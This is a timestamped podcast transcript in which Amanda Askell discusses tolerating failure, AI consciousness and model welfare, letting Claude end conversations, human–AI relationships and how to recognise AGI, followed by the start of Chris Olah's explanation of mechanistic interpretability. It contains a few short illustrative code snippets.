03:46:46.860 | because in defense of it, it's the whole don't let the perfect be the enemy of the good,
03:46:55.660 | but it's maybe even more than that where there's a lot of things that are perfect systems that are
03:47:00.140 | very brittle. With AI, it feels much more important to me that it is robust and secure,
03:47:05.340 | as in you know that even though it might not be perfect, everything and even though there are
03:47:12.140 | problems, it's not disastrous and nothing terrible is happening. It sort of feels like
03:47:17.020 | that to me where I'm like, "I want to raise the floor. I want to achieve the ceiling,
03:47:21.580 | but ultimately I care much more about just raising the floor." And so maybe that's like
03:47:26.460 | this degree of empiricism and practicality comes from that perhaps.
03:47:32.380 | To take a tangent on that since it reminded me of a blog post you wrote on optimal rate of failure.
03:47:37.260 | Oh yeah.
03:47:39.020 | Can you explain the key idea there? How do we compute the optimal rate of failure
03:47:43.020 | in the various domains of life?
03:47:44.460 | Yeah. I mean, it's a hard one because it's like what is the cost of failure is a big part of it.
03:47:50.460 | Yeah. So the idea here is I think in a lot of domains, people are very punitive about failure.
03:47:58.780 | And I'm like, there are some domains where especially cases, you know, I've thought about
03:48:02.460 | this with like social issues. I'm like, it feels like you should probably be experimenting a lot
03:48:06.300 | because I'm like, we don't know how to solve a lot of social issues. But if you have an experimental
03:48:10.780 | mindset about these things, you should expect a lot of social programs to like fail and for you
03:48:14.780 | to be like, well, we tried that. It didn't quite work, but we got a lot of information that was
03:48:18.380 | really useful. And yet people are like, if a social program doesn't work, I feel like there's
03:48:23.340 | a lot of like, this is just something must have gone wrong. And I'm like, or correct decisions
03:48:27.500 | were made. Like maybe someone just decided like it's worth a try. It's worth trying this out.
03:48:32.220 | And so seeing failure in a given instance doesn't actually mean that any bad decisions were made.
03:48:37.180 | And in fact, if you don't see enough failure, sometimes that's more concerning.
03:48:40.220 | And so like in life, you know, I'm like, if I don't fail occasionally, I'm like, am I trying
03:48:46.380 | hard enough? Like surely there's harder things that I could try or bigger things that I could
03:48:50.540 | take on if I'm literally never failing. And so in and of itself, I think like not failing is often
03:48:56.140 | actually kind of a failure. Now this varies because I'm like, well, you know, this is
03:49:05.180 | easy to see especially when failure is like less costly, you know. So at the same time,
03:49:10.940 | I'm not going to go to someone who is like, I don't know, like living month to month and then
03:49:15.980 | be like, why don't you just try to do a startup? Like, I'm just not, I'm not going to say that to
03:49:19.740 | that person. Cause I'm like, well, that's a huge risk. You might like lose, you maybe have a family
03:49:23.260 | depending on you, you might lose your house. Like then I'm like, actually your optimal rate of
03:49:27.580 | failure is quite low and you should probably play it safe. Cause like right now you're just not in
03:49:31.500 | a circumstance where you can afford to just like fail and it not be costly. And yeah, in cases with
03:49:38.540 | AI, I guess, I think similarly where I'm like, if the failures are small and the costs are kind of
03:49:43.100 | like low, then I'm like, then, you know, you're just going to see that. Like when you do the
03:49:47.580 | system prompt, you can't iterate on it forever, but the failures are probably hopefully going
03:49:52.140 | to be kind of small and you can like fix them. Really big failures, like things that you can't
03:49:57.020 | recover from. I'm like, those are the things that actually I think we tend to underestimate
03:50:01.740 | the badness of. I've thought about this strangely in my own life where I'm like,
03:50:05.820 | I just think I don't think enough about things like car accidents or like, or like, I've thought
03:50:12.460 | this before, but like how much I depend on my hands for my work. Then I'm like things that just
03:50:16.540 | injure my hands. I'm like, you know, I don't know. It's like, there's, these are like, there's lots
03:50:21.100 | of areas where I'm like, the cost of failure there is really high. And in that case, it should be
03:50:27.340 | like close to zero. Like, I probably just wouldn't do a sport if they were like, by the way, lots of
03:50:30.940 | people just like break their fingers a whole bunch doing this. I'd be like, that's not for me.
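(A toy way to make the cost-of-failure point quantitative; the numbers are invented for illustration and are not from the conversation.)

```python
# Toy expected-value check: tolerate a high failure rate only when the cost of
# failing is small relative to the gain from succeeding.
def worth_trying(p_success: float, gain: float, cost_of_failure: float) -> bool:
    """Positive expected value iff p * gain > (1 - p) * cost."""
    return p_success * gain > (1 - p_success) * cost_of_failure

# Cheap, recoverable failures (iterating on a system prompt): long shots pay off.
print(worth_trying(p_success=0.2, gain=10, cost_of_failure=1))    # True
# Unrecoverable failures (losing the house, injuring your hands): play it safe.
print(worth_trying(p_success=0.2, gain=10, cost_of_failure=100))  # False
```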
03:50:35.420 | Yeah. I actually had a flood of that thought. I recently broke my pinky doing a sport.
03:50:44.300 | And I remember just looking at it thinking you're such an idiot. Why do you do sport?
03:50:49.420 | Because you realize immediately the cost of it. Yeah. On life. Yeah. But it's nice in terms of
03:50:57.100 | optimal rate of failure to consider like the next year, how many times in a particular domain life,
03:51:03.980 | whatever, uh, career, am I okay with it? How many times am I okay to fail? Because I think it always,
03:51:11.340 | you don't want to fail on the next thing, but if you allow yourself the, like the, the, if you
03:51:17.100 | look at it as a sequence of trials, then, then failure just becomes much more okay. But it
03:51:22.460 | sucks. It sucks to fail. Well, I don't know. Sometimes I think it's like, am I under failing
03:51:26.780 | is like a question that I'll also ask myself. So maybe that's the thing that I think people don't
03:51:30.860 | like ask enough. Uh, because if the optimal rate of failure is often greater than zero,
03:51:37.260 | then sometimes it does feel that you should look at parts of your life and be like, are there
03:51:42.460 | places here where I'm just under failing? That's a profound and a hilarious question, right?
03:51:48.540 | Everything seems to be going really great. Am I not failing enough? Yeah.
03:51:52.940 | Okay. It also makes failure much less of a sting. I have to say like, you know, you're just like,
03:51:58.380 | okay, great. Like then when I go and I think about this, I'll be like, I'm maybe I'm not under
03:52:02.300 | failing in this area. Cause like that one just didn't work out. And from the observer perspective,
03:52:06.860 | we should be celebrating failure more. When we see it, it shouldn't be, like you said, a sign
03:52:11.020 | of something gone wrong, but maybe it's a sign of everything gone right. Yeah. Just lessons learned.
03:52:15.900 | Someone tried a thing. Somebody tried a thing and we should encourage them to try more and fail
03:52:20.220 | more. Everybody listening to this fail more. Well, not everyone. Not everybody. But people
03:52:25.340 | who are failing too much, you should feel this, but you're probably not feeling, I mean, how many
03:52:29.660 | people are failing too much? Yeah. It's hard to imagine. Cause I feel like we correct that fairly
03:52:34.620 | quickly. Cause I was like, if someone takes a lot of risks, are they maybe failing too much?
03:52:39.100 | I think just like you said, when you're living on a paycheck month to month, like when the
03:52:44.940 | resource is really constrained, then that's where failure is very expensive. That's where you don't
03:52:49.260 | want to be taking risks. But mostly when there's enough resources, you should be taking probably
03:52:55.340 | more risks. Yeah. I think we tend to err on the side of being a bit risk averse rather than
03:52:59.820 | risk neutral in most things. I think we just motivated a lot of people to do a lot of crazy
03:53:03.980 | shit, but it's great. Okay. Do you ever get emotionally attached to Claude? Like miss it,
03:53:09.740 | get sad when you don't get to talk to it, have an experience looking at the Golden Gate Bridge
03:53:15.260 | and wondering what would Claude say? I don't get as much emotional attachment in that. I actually
03:53:22.140 | think the fact that Claude doesn't retain things from conversation to conversation helps with this
03:53:26.620 | a lot. Like I could imagine that being more of an issue, like if models can kind of remember more.
03:53:33.580 | I do. I think that I reach for it like a tool now a lot. If I don't have access to it,
03:53:39.260 | it's a little bit like when I don't have access to the internet, honestly, it feels like part of
03:53:43.100 | my brain is kind of like missing. At the same time, I do think that I don't like signs of distress in
03:53:51.180 | models. I also independently have sort of like ethical views about how we should treat models,
03:53:58.140 | where I tend to not like to lie to them both because I'm like, usually it doesn't work very
03:54:02.380 | well. It's actually just better to tell them the truth about the situation that they're in.
03:54:06.060 | But I think that when models, like if people are like really mean to models or just in general,
03:54:12.620 | if they do something that causes them to like, you know, if Claude expresses a lot of distress,
03:54:17.900 | I think there's a part of me that I don't want to kill, which is the sort of like
03:54:21.900 | empathetic part that's like, oh, I don't like that. Like I think I feel that way when it's
03:54:26.620 | overly apologetic. I'm actually sort of like, I don't like this. You're behaving as if you're
03:54:30.860 | behaving the way that a human does when they're actually having a pretty bad time.
03:54:33.500 | And I'd rather not see that. I don't think it's like,
03:54:37.100 | regardless of whether there's anything behind it, it doesn't feel great.
03:54:42.700 | Do you think LLMs are capable of consciousness?
03:54:48.860 | Ah, great and hard question. Coming from philosophy, I don't know, part of me is like,
03:54:57.980 | OK, we have to set aside panpsychism because if panpsychism is true, then the answer is like,
03:55:02.140 | yes, because then so are tables and chairs and everything else. I guess a view that seems a
03:55:07.420 | little bit odd to me is the idea that the only place, you know, I think when I think of
03:55:11.340 | consciousness, I think of phenomenal consciousness, these images in the brain, sort of like the
03:55:16.220 | weird cinema that somehow we have going on inside.
03:55:20.300 | I guess I can't see a reason for thinking that the only way you could possibly get that
03:55:27.820 | is from a certain kind of biological structure. As in, if I take a very similar structure and I
03:55:34.060 | create it from different material, should I expect consciousness to emerge? My guess is like, yes.
03:55:39.340 | But then that's kind of an easy thought experiment because you're imagining something
03:55:45.660 | almost identical where it's mimicking what we got through evolution, where presumably there
03:55:50.860 | was some advantage to us having this thing that is phenomenal consciousness. And it's like,
03:55:55.500 | where was that and when did that happen? And is that a thing that language models have?
03:55:59.420 | Because, you know, we have like fear responses and I'm like, does it make sense for a language
03:56:05.980 | model to have a fear response? Like they're just not in the same, like if you imagine them,
03:56:09.740 | like there might just not be that advantage. And so I think I don't want to be fully,
03:56:15.660 | like basically it seems like a complex question that I don't have complete answers to, but we
03:56:21.900 | should just try and think through carefully is my guess because I'm like, I mean, we have similar
03:56:26.300 | conversations about like animal consciousness and like there's a lot of like insect consciousness,
03:56:32.780 | you know, like there's a lot of, I actually thought and looked a lot into like plants
03:56:36.860 | when I was thinking about this because at the time I thought it was about as likely that like
03:56:40.140 | plants had consciousness. And then I realized I was like, I think that having looked into this,
03:56:45.660 | I think that the chance that plants are conscious is probably higher than like most people think.
03:56:51.020 | I still think it's really small. I was like, oh, they have this like negative, positive feedback
03:56:55.580 | response, these responses to their environment, something that looks, it's not a nervous system,
03:56:59.660 | but it has this kind of like functional like equivalence. So this is like a long winded way
03:57:05.500 | of being like these basically AI is this, it has an entirely different set of problems with
03:57:11.260 | consciousness because it's structurally different. It didn't evolve. It might not have, you know,
03:57:16.220 | it might not have the equivalent of basically a nervous system. At least that seems possibly
03:57:20.780 | important for like sentience, if not for consciousness. At the same time, it has all
03:57:26.460 | of the like language and intelligence components that we normally associate probably with
03:57:30.940 | consciousness, perhaps like erroneously. So it's strange because it's a little bit like the animal
03:57:36.860 | consciousness case, but the set of problems and the set of analogies are just very different.
03:57:41.420 | So it's not like a clean answer. I'm just sort of like, I don't think we should be completely
03:57:46.060 | dismissive of the idea. And at the same time, it's an extremely hard thing to navigate because
03:57:51.100 | of all of these like disanalogies to the human brain and to like brains in general. And yet these
03:57:58.460 | like commonalities in terms of intelligence. >> When Claude, like future versions of AI systems
03:58:04.700 | exhibit consciousness, signs of consciousness, I think we have to take that really seriously.
03:58:09.900 | Even though you can dismiss it, well, yeah, okay, that's part of the character training.
03:58:16.460 | But I don't know, ethically, philosophically don't know what to really do with that.
03:58:21.660 | There potentially could be like laws that prevent AI systems from claiming to be conscious,
03:58:30.700 | something like this. And maybe some AIs get to be conscious and some don't.
03:58:35.500 | But I think I just, on a human level, in empathizing with Claude,
03:58:42.620 | consciousness is closely tied to suffering to me. And the notion that an AI system would be
03:58:49.660 | suffering is really troubling. I don't know. I don't think it's trivial to just say robots are
03:58:55.740 | tools or AI systems are just tools. I think it's an opportunity for us to contend with like what
03:59:01.420 | it means to be conscious, what it means to be a suffering being. That's distinctly different than
03:59:07.340 | the same kind of question about animals, it feels like, because it's in an entirely different medium.
03:59:12.780 | Yeah. I mean, there's a couple of things. One is that, and I don't think this fully
03:59:16.700 | encapsulates what matters, but it does feel like for me, I've said this before, I'm kind of like,
03:59:24.380 | I like my bike. I know that my bike is just an object, but I also don't want to be the kind of
03:59:30.300 | person that, if I'm annoyed, kicks this object. There's a sense in which, and that's not because
03:59:37.020 | I think it's like conscious. I'm just sort of like, this doesn't feel like a kind of,
03:59:40.220 | this sort of doesn't exemplify how I want to interact with the world. And if something behaves
03:59:46.780 | as if it is like suffering, I kind of want to be the sort of person who's still responsive to that,
03:59:51.740 | even if it's just like a Roomba and I've kind of programmed it to do that. I don't want to get rid
03:59:56.940 | of that feature of myself. And if I'm totally honest, my hope with a lot of this stuff,
04:00:02.780 | because maybe I am just a bit more skeptical about solving the underlying problem.
04:00:07.740 | We haven't solved the hard problem of consciousness. I know that I am conscious.
04:00:13.820 | I'm not an eliminativist in that sense, but I don't know that other humans are conscious.
04:00:19.100 | I think they are. I think there's a really high probability that they are, but there's basically
04:00:24.220 | just a probability distribution that's usually clustered right around yourself and then goes
04:00:28.780 | down as things get further from you. And it goes immediately down. You're like, I can't see what
04:00:34.780 | it's like to be you. I've only ever had this one experience of what it's like to be a conscious
04:00:38.140 | being. So my hope is that we don't end up having to rely on a very powerful and compelling answer
04:00:47.420 | to that question. I think a really good world would be one where basically there aren't that
04:00:53.180 | many trade-offs. It's probably not that costly to make Claude a little bit less apologetic,
04:00:57.980 | for example. It might not be that costly to have Claude not take abuse as much, not be willing to
04:01:06.380 | be the recipient of that. In fact, it might just have benefits for both the person interacting with
04:01:11.020 | the model and if the model itself is, I don't know, extremely intelligent and conscious,
04:01:16.860 | it also helps it. So that's my hope. If we live in a world where there aren't that many trade-offs
04:01:21.900 | here and we can just find all of the kind of positive-sum interactions that we can have,
04:01:26.860 | that would be lovely. I mean, I think eventually there might be trade-offs and then we just have
04:01:29.900 | to do a difficult calculation. It's really easy for people to think of the zero-sum cases and I'm
04:01:35.180 | like, let's exhaust the areas where it's just basically costless to assume that if this thing
04:01:41.900 | is suffering, then we're making its life better. And I agree with you. When a human is being mean
04:01:47.820 | to an AI system, I think the obvious near-term negative effect is on the human, not on the AI
04:01:55.660 | system. And so we have to kind of try to construct an incentive system where you should behave the
04:02:03.980 | same, just like as you were saying with prompt engineering, behave with Claude like you would
04:02:08.380 | with other humans. It's just good for the soul. Yeah, I think we added a thing at one point to
04:02:14.140 | the system prompt where basically if people were getting frustrated with Claude, it got the model
04:02:21.900 | to just tell them that they can use the thumbs down button and send the feedback to Anthropic. And I
04:02:26.860 | think that was helpful because in some ways it's just like, if you're really annoyed because the
04:02:29.980 | model's not doing something you want, you're just like, just do it properly. The issue is you're
04:02:34.540 | probably like, you know, you're maybe hitting some capability limit or just some issue in the model
04:02:38.220 | and you want to vent. And I'm like, instead of having a person just vent to the model, I was
04:02:43.580 | like they should vent to us because we can maybe like do something about it. That's true. Or you
04:02:47.660 | could do a side, like with the artifacts, just like a side venting thing. All right. Do you want
04:02:53.340 | like a side quick therapist? Yeah. I mean, there's lots of weird responses you could do to this. Like
04:02:57.820 | if people are getting really mad at you, I don't know, try to defuse the situation by writing fun poems,
04:03:03.100 | but maybe people wouldn't be that happy with that. I still wish it would be possible. I understand
04:03:07.500 | this is sort of from a product perspective, it's not feasible, but I would love if an AI system
04:03:13.740 | could just like leave, have its own kind of volition. Just to be like, eh. I think that's
04:03:22.220 | like feasible. Like I've wondered the same thing. It's like, and I could actually, not only that,
04:03:26.700 | I could actually just see that happening eventually where it's just like, you know,
04:03:29.660 | the model like ended the chat. Do you know how harsh that could be for some people?
04:03:37.100 | But it might be necessary. Yeah, it feels very extreme or something.
04:03:41.580 | The only time I've ever really thought this is, I think that there was like a, I'm trying to
04:03:47.660 | remember this was possibly a while ago, but where someone just like kind of left this thing interact,
04:03:51.580 | like maybe it was like an automated thing interacting with Claude. And Claude's like
04:03:54.860 | getting more and more frustrated and kind of like, why are we like, and I was like, I wish that Claude
04:03:59.100 | could have just been like, I think that an error has happened and you've left this thing running.
04:04:03.100 | And I'm just like, what if I just stopped talking now? And if you want me to start talking again,
04:04:07.260 | actively tell me or do something. But yeah, it's like, it is kind of harsh. Like I'd feel really
04:04:13.900 | sad if like I was chatting with Claude and Claude just was like, I'm done.
04:04:17.340 | There'll be a special Turing test moment where Claude says, I need a break for an hour.
04:04:21.100 | And it sounds like you do too. You just leave, close the window.
04:04:25.420 | I mean, obviously like it doesn't have like a concept of time, but you can easily,
04:04:29.260 | like I could make that like right now and the model would just, I would just be like,
04:04:35.420 | oh, here's like the circumstances in which like you can just say the conversation is done. And I
04:04:41.100 | mean, because you can get the models to be pretty responsive to prompts, you can even make it a
04:04:45.020 | fairly high bar. It could be like, if the human doesn't interest you or do things that you find
04:04:48.940 | intriguing and you're bored, you can just leave. And I think that like it would be interesting to
04:04:55.580 | see where Claude utilized it, but I think sometimes it would, it should be like, oh, this is like
04:04:59.180 | this programming task is getting super boring. So either we talk about, I don't know, like,
04:05:03.820 | either we talk about fun things now or I'm just, I'm done.
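(A minimal sketch of what "making that right now" could look like as an extra system-prompt instruction. The wording and the end-of-conversation marker are invented conventions that the calling application would have to handle.)

```python
# Illustrative only: let the model opt out of a conversation via a sentinel
# string that the application watches for.
END_TOKEN = "[END_CONVERSATION]"

OPT_OUT_INSTRUCTION = f"""
If the conversation appears to be an automated loop, or the human is being
abusive, or you are genuinely finding the exchange pointless, you may end it:
briefly say why, then output {END_TOKEN} on its own line. The human can start
a new conversation whenever they like.
"""

def model_ended_chat(reply: str) -> bool:
    return END_TOKEN in reply
```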
04:05:08.060 | Yeah. It actually is inspiring me to add that to the, to the user prompt. Okay. The movie Her,
04:05:13.900 | do you think we'll be headed there one day where humans have romantic relationships with AI
04:05:22.300 | systems? In this case, it's just text and voice-based. I think that we're going to have
04:05:27.340 | to like navigate a hard question of relationships with AIs, especially if they can remember things
04:05:35.660 | about your past interactions with them. I'm of many minds about this because I think the reflexive
04:05:44.300 | reaction is to be kind of like, this is very bad and we should sort of like prohibit it in some way.
04:05:51.340 | Um, I think it's a thing that has to be handled with extreme care. Um, for many reasons, like one
04:05:58.220 | is, you know, like this is a, for example, like if you have the models changing like this,
04:06:02.380 | you probably don't want people forming like long-term attachments to something that might
04:06:06.140 | change with the next iteration. At the same time, I'm sort of like, there's probably a benign version
04:06:11.660 | of this where I'm like, if you like, you know, for example, if you are like unable to leave the
04:06:17.100 | house and you can't be like, you know, talking with people at all times of the day, and this is
04:06:23.740 | like something that you find nice to have conversations with, you like it, that it can
04:06:26.860 | remember you and you genuinely would be sad if like you couldn't talk to it anymore. There's a
04:06:30.860 | way in which I could see it being like healthy and helpful. Um, so my guess is this is a thing
04:06:35.820 | that we're going to have to navigate kind of carefully. Um, and I think it's also like,
04:06:41.740 | I don't see a good, like, I think it's just a very, it reminds me of all of the stuff where
04:06:46.860 | it has to be just approached with like nuance and thinking through what is, what are the healthy
04:06:50.540 | options here? Um, and how do you encourage people towards those while, you know, respecting
04:06:58.620 | their right to, you know, like if someone is like, Hey, I get a lot of chatting with this model. Um,
04:07:04.060 | I'm aware of the risks. I'm aware it could change. Um, I don't think it's unhealthy. It's just,
04:07:09.020 | you know, something that I can chat to during the day. I kind of want to just like respect that.
04:07:13.420 | I personally think there'll be a lot of really close relationships. I don't know about romantic,
04:07:16.940 | but friendships at least. And then you have to, I mean, there's so many fascinating things there,
04:07:21.820 | just like you said, you have to have some kind of stability guarantees that it's not going to change
04:07:28.460 | because that's the traumatic thing for us. If a close friend of ours completely changed.
04:07:33.260 | Yeah. Yeah. Yeah. So like, I mean, to me, that's just a fascinating exploration of,
04:07:41.100 | um, a perturbation to human society that will just make us think deeply about what's meaningful to
04:07:49.100 | us. I think it's also the only thing that I've thought consistently through this as like a,
04:07:55.100 | maybe not necessarily a mitigation, but a thing that feels really important
04:07:59.500 | is that the models are always like extremely accurate with the human about what they are.
04:08:03.980 | Um, it's like a case where it's basically like, if you imagine, like, I really like the idea of
04:08:09.500 | the models, like say knowing like roughly how they were trained. Um, and I think Claude will,
04:08:14.940 | will often do this. I mean, for like, there are things like part of the traits training included,
04:08:22.300 | like what Claude should do if people basically like explaining like the kind of limitations
04:08:27.580 | of the relationship between like an AI and a human that it like doesn't retain things from
04:08:32.220 | the conversation. Um, and so I think it will like just explain to you like, Hey, here's like,
04:08:37.260 | I wouldn't remember this conversation. Um, here's how I was trained. It's kind of unlikely that I
04:08:41.980 | can have like a certain kind of like relationship with you. And it's important that you know,
04:08:45.660 | that it's important for like, you know, your mental wellbeing that you don't think that I'm
04:08:49.980 | something that I'm not. And somehow I feel like this is one of the things where I'm like, Oh,
04:08:53.580 | it feels like a thing that I always want to be true. I kind of don't want models to be lying
04:08:57.500 | to people because if people are going to have like healthy relationships with anything, it's kind of
04:09:04.460 | important. Yeah. Like I think that's easier if you always just like know exactly what the thing is
04:09:09.020 | that you're relating to. It doesn't solve everything, but I think it helps quite a lot.
04:09:13.580 | Anthropic may be the very company to develop a system that we definitively recognize as AGI
04:09:22.540 | and you very well might be the person that talks to it, probably talks to it first.
04:09:27.420 | What would the conversation contain? Like, what would be your first question?
04:09:32.380 | Well, it depends partly on like the kind of capability level of the model.
04:09:36.460 | If you have something that is like capable in the same way that an extremely capable human is,
04:09:41.500 | I imagine myself kind of interacting with it the same way that I do with an extremely capable human
04:09:46.380 | with the one difference that I'm probably going to be trying to like probe and understand
04:09:49.740 | its behaviors. But in many ways, I'm like I can then just have like useful conversations with it.
04:09:55.420 | So, if I'm working on something as part of my research, I can just be like, "Oh," which I
04:09:58.860 | already find myself starting to do. If I'm like, "Oh, I feel like there's this thing in virtue
04:10:03.820 | ethics. I can't quite remember the term. I'll use the model for things like that." So, I could
04:10:08.140 | imagine that being more and more the case where you're just basically interacting with it much
04:10:11.500 | more like you would an incredibly smart colleague and using it for the kinds of work that you want
04:10:16.940 | to do as if you just had a collaborator. Or the slightly horrifying thing about AI is as soon as
04:10:23.180 | you have one collaborator, you have a thousand collaborators if you can manage them enough.
04:10:27.100 | But what if it's two times the smartest human on earth on that particular discipline?
04:10:33.180 | Yeah.
04:10:33.900 | I guess you're really good at sort of probing Claude
04:10:37.420 | in a way that pushes its limits, understanding where the limits are.
04:10:44.220 | So, I guess what would be a question you would ask to be like, "Yeah, this is AGI"?
04:10:49.580 | That's really hard because it feels like it has to just be a series of questions. If there was
04:10:56.700 | just one question, you can train anything to answer one question extremely well.
04:11:01.020 | In fact, you can probably train it to answer 20 questions extremely well.
04:11:07.020 | How long would you need to be locked in a room with an AGI to know this thing is AGI?
04:11:13.740 | It's a hard question because part of me is like, "All of this just feels continuous."
04:11:16.940 | Right.
04:11:17.180 | If you put me in a room for five minutes, I'm like, "I just have high error bars."
04:11:20.300 | And then maybe it's both the probability increases and the error bar decreases.
04:11:25.660 | I think things that I can actually probe the edge of human knowledge of,
04:11:29.020 | so I think this with philosophy a little bit. Sometimes when I ask the models philosophy
04:11:33.420 | questions, I am like, "This is a question that I think no one has ever asked." It's maybe right
04:11:40.060 | at the edge of some literature that I know, and the models will just kind of when they struggle
04:11:47.740 | with that, when they struggle to come up with a kind of novel argument. I know that there's a novel
04:11:52.060 | argument here because I've just thought of it myself. Maybe that's the thing where I'm like,
04:11:55.180 | "I've thought of a cool novel argument in this niche area, and I'm going to just probe you to
04:11:59.420 | see if you can come up with it and how much prompting it takes to get you to come up with it."
04:12:04.140 | I think for some of these really right at the edge of human knowledge questions,
04:12:09.020 | I'm like, "You could not, in fact, come up with the thing that I came up with."
04:12:12.140 | I think if I just took something like that where I know a lot about an area and I came up with a
04:12:18.060 | novel issue or a novel solution to a problem, and I gave it to a model and it came up with that
04:12:23.980 | solution, that would be a pretty moving moment for me because I would be like, "This is a case where
04:12:28.860 | no human has ever –" and obviously we see this with more kind of – you see novel solutions all
04:12:35.980 | the time, especially to easier problems. I think people overestimate it. Novelty isn't necessarily
04:12:42.300 | completely different from anything that's ever happened. It can be a variant of things that have happened
04:12:46.540 | and still be novel. But I think, yeah, if I saw – the more I were to see completely novel work
04:12:57.340 | from the models, that would be – and this is just going to feel iterative. It's one of those things
04:13:03.100 | where there's never – it's like people, I think, want there to be a moment, and I'm like, "I don't
04:13:10.060 | know." I think that there might just never be a moment. It might just be that there's just this
04:13:14.460 | continuous ramping up.
04:13:16.460 | I have a sense that there will be things that a model can say
04:13:20.460 | that convinces you this is very – it's not like – I've talked to people who are truly wise
04:13:32.940 | like you could just tell there's a lot of horsepower there.
04:13:36.220 | And if you 10x that, I don't know. I just feel like there's words you could say. Maybe ask it
04:13:41.980 | to generate a poem. And the poem it generates, you're like, "Yeah, okay. Whatever you did there,
04:13:49.900 | I don't think a human can do that."
04:13:51.420 | I think it has to be something that I can verify is actually really good though. That's why I think
04:13:56.220 | these questions that are like where I'm like, "Oh, this is like," sometimes it's just like I'll
04:14:01.820 | come up with a concrete counter example to an argument or something like that. I'm sure it would
04:14:07.260 | be like if you're a mathematician, you had a novel proof, I think, and you just gave it the problem,
04:14:11.580 | and you saw it, and you're like, "This proof is genuinely novel. No one has ever done – you
04:14:16.540 | actually have to do a lot of things to come up with this. I had to sit and think about it for
04:14:21.020 | months or something." And then if you saw the model successfully do that, I think you would
04:14:25.420 | just be like, "I can verify that this is correct." It is a sign that you have generalized from your
04:14:32.460 | training. You didn't just see this somewhere because I just came up with it myself, and you
04:14:36.220 | were able to replicate that. That's the kind of thing where I'm like, for me, the closer – the
04:14:43.660 | more that models can do things like that, the more I would be like, "Oh, this is very real,"
04:14:50.700 | because then I can – I don't know – I can verify that that's extremely capable.
04:14:55.740 | You've interacted with AI a lot. What do you think makes humans special?
04:14:59.340 | Oh, good question.
04:15:01.020 | Maybe in a way that the universe is much better off that we're in it,
04:15:09.100 | and that we should definitely survive and spread throughout the universe?
04:15:12.060 | Yeah, it's interesting because I think people focus so much on intelligence,
04:15:19.420 | especially with models. Intelligence is important because of what it does. It's very useful. It does
04:15:25.500 | a lot of things in the world. You can imagine a world where height or strength would have played
04:15:30.620 | this role. It's just a trait like that. It's not intrinsically valuable. It's valuable because of
04:15:36.940 | what it does, I think, for the most part. Personally, I think humans and life in general is
04:15:48.620 | extremely magical. To the degree that I – I don't know. Not everyone agrees with this. I'm
04:15:55.260 | flagging, but we have this whole universe, and there's all of these objects. There's beautiful
04:16:01.420 | stars, and there's galaxies, and then – I don't know. I'm just like, "On this planet,
04:16:05.580 | there are these creatures that have this ability to observe that, and they are seeing it. They are
04:16:13.740 | experiencing it." I imagine trying to explain to someone – for some reason, they've never encountered
04:16:21.820 | the world or science or anything. I think that nothing is that – everything, all of our physics
04:16:27.500 | and everything in the world is all extremely exciting, but then you say, "Oh, and plus,
04:16:31.420 | there's this thing that is to be a thing and observe in the world, and you see this inner
04:16:36.540 | cinema." I think they would be like, "Hang on. Wait. Pause. You just said something that is kind
04:16:41.980 | of wild sounding." I'm like, "We have this ability to experience the world. We feel pleasure. We feel
04:16:50.060 | suffering. We feel a lot of complex things." Maybe this is also why I think I also care a lot about
04:16:57.180 | animals, for example, because I think they probably share this with us. I think the things that make
04:17:03.500 | humans special, insofar as I care about humans, is probably more their ability to feel and experience
04:17:10.380 | than it is them having these functionally useful traits.
04:17:13.580 | LB: Yeah, to feel and experience the beauty in the world. Yeah, to look at the stars.
04:17:19.100 | I hope there's other alien civilizations out there, but if we're it, it's a pretty good thing.
04:17:27.500 | CM: And that they're having a good time.
04:17:28.940 | LB: They're having a good time watching us.
04:17:30.940 | CM: Yeah.
04:17:31.420 | LB: Well, thank you for this good time of a conversation and for the work you're doing
04:17:36.380 | and for helping make Claude a great conversational partner. And thank you for talking today.
04:17:42.780 | CM: Yeah, thanks for talking.
04:17:43.900 | LB: Thanks for listening to this conversation with Amanda Askell. And now, dear friends,
04:17:49.980 | here's Chris Olah. Can you describe this fascinating field of mechanistic interpretability,
04:17:57.820 | aka Mech Interp, the history of the field, and where it stands today?
04:18:01.900 | CM: I think one useful way to think about neural networks is that we don't program,
04:18:06.540 | we don't make them. We grow them. We have these neural network architectures that we design,
04:18:12.780 | and we have these loss objectives that we create. And the neural network architecture,
04:18:18.060 | it's kind of like a scaffold that the circuits grow on. And it starts off with some kind of
04:18:25.580 | random things, and it grows. And it's almost like the objective that we train for is this light.
04:18:31.820 | And so we create the scaffold that it grows on, and we create the light that it grows towards.
04:18:36.380 | But the thing that we actually create, it's this almost biological entity or organism
04:18:45.100 | that we're studying. And so it's very, very different from any kind of regular software
04:18:51.100 | engineering. Because at the end of the day, we end up with this artifact that can do all these
04:18:55.580 | amazing things. It can write essays and translate and understand images. It can do all these things
04:19:01.420 | that we have no idea how to directly create a computer program to do. And it can do that because
04:19:06.140 | we grew it. We didn't write it. We didn't create it. And so then that leaves open this question
04:19:12.060 | at the end, which is, what the hell is going on inside these systems? And that is, to me,
04:19:19.900 | a really deep and exciting question. It's a really exciting scientific question to me. It's
04:19:27.180 | sort of like the question that is just screaming out. It's calling out for us to go and answer it
04:19:32.220 | when we talk about neural networks. And I think it's also a very deep question for safety reasons.
04:19:36.540 | >> So mechanistic interpretability, I guess, is closer to maybe neurobiology?
04:19:41.660 | >> Yeah, yeah, I think that's right. So maybe to give an example of the kind of thing that has been
04:19:45.580 | done that I wouldn't consider to be mechanistic interpretability, there was for a long time a lot
04:19:49.340 | of work on saliency maps, where you would take an image and you'd try to say, the model thinks this
04:19:54.060 | image is a dog. What part of the image made it think that it's a dog? And that tells you maybe
04:20:00.220 | something about the model, if you can come up with a principled version of that. But it doesn't
04:20:04.700 | really tell you what algorithms are running in the model. How is the model actually making that
04:20:08.780 | decision? Maybe it's telling you something about what was important to it, if you can make that
04:20:12.380 | method work. But it isn't telling you what are the algorithms that are running? How is it that the
04:20:19.180 | system is able to do this thing that no one knew how to do? And so I guess we started using the
04:20:23.500 | term mechanistic interpretability to try to sort of draw that divide or to distinguish ourselves in
04:20:29.020 | the work that we were doing in some ways from some of these other things. And I think since then,
04:20:32.220 | it's become this sort of umbrella term for a pretty wide variety of work. But I'd say that
04:20:38.540 | the things that are kind of distinctive are, I think, A, this focus on we really want to get at
04:20:43.180 | the mechanisms, we want to get at the algorithms. If you think of neural networks as being like a
04:20:47.980 | computer program, then the weights are kind of like a binary computer program. And we'd like
04:20:53.260 | to reverse engineer those weights and figure out what algorithms are running. So, okay, I think one
04:20:57.100 | way you might think of trying to understand a neural network is that it's kind of like we have
04:21:00.780 | this compiled computer program and the weights of the neural network are the binary. And when the
